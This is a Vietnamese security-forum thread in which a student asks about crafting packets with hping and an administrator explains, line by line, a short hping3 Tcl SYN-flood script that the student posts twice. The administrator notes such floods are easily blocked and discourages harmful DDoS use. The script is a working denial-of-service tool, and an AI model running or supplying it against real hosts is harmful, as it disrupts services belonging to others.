hỏi :cách tạo gói tin với hping.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

hỏi :cách tạo gói tin với hping.

[Question] hỏi :cách tạo gói tin với hping.	28/03/2011 21:36:21 (+0700) \| #1 \| 234160

servers_ht
Member

Joined: 11/10/2010 22:53:50
Messages: 17
Offline

[b][b]ý em la thế này : em muốn dùng hping để tạo ra các packet với các tuỳ chọn theo ý mình như : khởi tạo các cờ ( flag ) hay chèn một nội dung tuỳ ý vào các gói tin ? Không biết hping có thể tạo ra được một số lượng lớn các packet trong một khoảng thời gian không nhỉ ?
mong mọi người chỉ bảo ! e xin chân thành cảm ơn ![/b][/b]

[Question] hỏi :cách tạo gói tin với hping.	29/03/2011 08:31:51 (+0700) \| #2 \| 234173

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

servers_ht wrote:

ý em la thế này : em muốn dùng hping để tạo ra các packet với các tuỳ chọn theo ý mình như : khởi tạo các cờ ( flag ) hay chèn một nội dung tuỳ ý vào các gói tin ? Không biết hping có thể tạo ra được một số lượng lớn các packet trong một khoảng thời gian không nhỉ ?
mong mọi người chỉ bảo ! e xin chân thành cảm ơn !

Bồ nên tham khảo API của Hping ở đây: http://wiki.hping.org/34 và nên làm quen với TCL ở đây: http://www.invece.org/tclwise/

Bồ định dùng Hping để DoS hay sao mà cần tạo ra số lượng lớn packets trong một khoảng thời gian?

What bringing us together is stronger than what pulling us apart.

[Question] hỏi :cách tạo gói tin với hping.	29/03/2011 08:35:51 (+0700) \| #3 \| 234176

StarGhost
Elite Member

Joined: 29/03/2005 20:34:22
Messages: 662
Location: The Queen
Offline

Tạo số lượng lớn trong thời gian ngắn thì nên dùng C để đạt được tốc độ cần thiết.

Mind your thought.

[Question] hỏi :cách tạo gói tin với hping.	03/04/2011 19:48:15 (+0700) \| #4 \| 234541

servers_ht
Member

Joined: 11/10/2010 22:53:50
Messages: 17
Offline

anh có thể giải thích cho em các biến trong đoạn chương trình dưới đây không và phải làm như thế nào? ! em biết việc này có lẽ rất kị đối với những người có kinh ngiệm như anh "conmale" nhưng đối với em nó rất quan trọng.Kính mong anh giúp đỡ! chân thành cảm ơn anh!

# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

if {$argc < 2} {
puts "Required arguments: hostname dstport"
exit 1
}

foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]

puts "Synflooding $target..."

while {1} {
hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
}

[Question] hỏi :cách tạo gói tin với hping.	03/04/2011 20:14:38 (+0700) \| #5 \| 234544

servers_ht
Member

Joined: 11/10/2010 22:53:50
Messages: 17
Offline

'mọi người trong diễn đàn ai rành về hping giúp đỡ em với

[Question] hỏi :cách tạo gói tin với hping.	04/04/2011 06:12:20 (+0700) \| #6 \| 234589

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

servers_ht wrote:

anh có thể giải thích cho em các biến trong đoạn chương trình dưới đây không và phải làm như thế nào? ! em biết việc này có lẽ rất kị đối với những người có kinh ngiệm như anh "conmale" nhưng đối với em nó rất quan trọng.Kính mong anh giúp đỡ! chân thành cảm ơn anh!

# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

if {$argc < 2} {
puts "Required arguments: hostname dstport"
exit 1
}

foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]

puts "Synflooding $target..."

while {1} {
hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
}

Đây chỉ là một đoạn tcl hết sức đơn giản thực thi các hping command nhưng nếu không biết tcl là cái gì thì nó trở thành một đống... bầy nhầy khó hiểu smilie

# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

Đoạn này chỉ cách sử dụng là phải gõ synflood.htcl đồng thời phải đưa vào hai thông số "hostname" (tên host "bị" tấn công) và "dstport" (cổng dịch vụ "bị" tấn công của host đó).

if {$argc < 2} {
puts "Required arguments: hostname dstport"
exit 1
}

Đây chỉ là một đoạn "trap" (hoặc safecheck) để buộc người thực thi script synflood.htcl phải đưa vào 2 thông số (như đã giải thích ở trên). Điều kiện cách "if" kiểm tra xem giá trị $arg (nhận thông số) có phải có 2 thông số hay không, nếu có ít hơn 2 thông số thì "la lên" là "Required arguments: hostname dstport".

foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]

đây là đoạn logic để xây dựng các mảng thông tin trước khi thực thi hành động "flood" (bên dưới).
Những đoạn màu đỏ chỉ đơn giản là những dòng khai báo của ngôn ngữ tcl. Đặc biệt phần "set srcport 14000" là phần ấn định cổng nguồn là 14000 ngay trên máy thực thi cái script.
Đoạn màu cam là đoạn thực thi hping command "outifa" http://wiki.hping.org/42) nhắm lấy giá trị IP của chính máy đang thực thi script.

puts "Synflooding $target..."

Đoạn này chỉ đơn giản in ra thông báo là đoạn script bắt đầu... flood.

while {1} {
hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
}

Đây là đoạn cốt lõi thực thi việc flood. Với while {1} (luôn luôn true), nó thực hiện hping command màu cam http://wiki.hping.org/36) với những mảng thông tin đã được xây dựng ở trên.

Nói tóm lại: học tcl và đọc kỹ API của hping thì sẽ có câu giải thích tốt nhất.

PS: flood kiểu này chỉ chơi cho vui thôi. Những hệ thống phòng thủ ngày nay cản dạng flood này chí bằng 1 cái búng tay cho nên biết cho vui chớ chẳng có mấy tác dụng đâu.

What bringing us together is stronger than what pulling us apart.

[Question] hỏi :cách tạo gói tin với hping.	04/04/2011 08:00:21 (+0700) \| #7 \| 234601

servers_ht
Member

Joined: 11/10/2010 22:53:50
Messages: 17
Offline

rất cảm ơn anh! em biết là dạng tấn công food này rất dễ chống.em cũng đã đọc qua bài ký sự về DDoS trên diễn đàn, rất là hay nên em chỉ muốn tìm hiểu chút đỉnh thôi.Mong anh viết thật nhiều bài nữa để những sinh viên như em có cơ hội học hỏi thêm.
ngày nay các cuộc tấn công DDoS có những điểm gì đặc biệt so với trước kia không anh?

[Question] hỏi :cách tạo gói tin với hping.	04/04/2011 08:11:38 (+0700) \| #8 \| 234605

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

servers_ht wrote:

rất cảm ơn anh! em biết là dạng tấn công food này rất dễ chống.em cũng đã đọc qua bài ký sự về DDoS trên diễn đàn, rất là hay nên em chỉ muốn tìm hiểu chút đỉnh thôi.Mong anh viết thật nhiều bài nữa để những sinh viên như em có cơ hội học hỏi thêm.
ngày nay các cuộc tấn công DDoS có những điểm gì đặc biệt so với trước kia không anh?

Ngày trước hầu hết là DoS và ngày nay hầu hết là DDoS. Hai cái khác nhau xa. Ngày nay chẳng còn mấy ai DoS nữa bởi vì dạng này bị khắc chế rất dễ dàng. Ngày nay chủ yếu là DDoS và mục tiêu là tập trung càng nhiều zombies càng tốt (thì mới triệt được mục tiêu). Nghiên cứu về DDoS để khắc phục vấn nạn này thì nên, nghiên cứu về DDoS để tiếp tục gây tàn hại thì không nên vì cho đến nay, DDoS vẫn là một thứ vấn nạn khủng khiếp.

What bringing us together is stronger than what pulling us apart.

[Question] hỏi :cách tạo gói tin với hping.	04/04/2011 12:48:42 (+0700) \| #9 \| 234627

servers_ht
Member

Joined: 11/10/2010 22:53:50
Messages: 17
Offline

vâng rất cảm ơn những lời khuyên của anh

Go to:

Users currently in here
1 Anonymous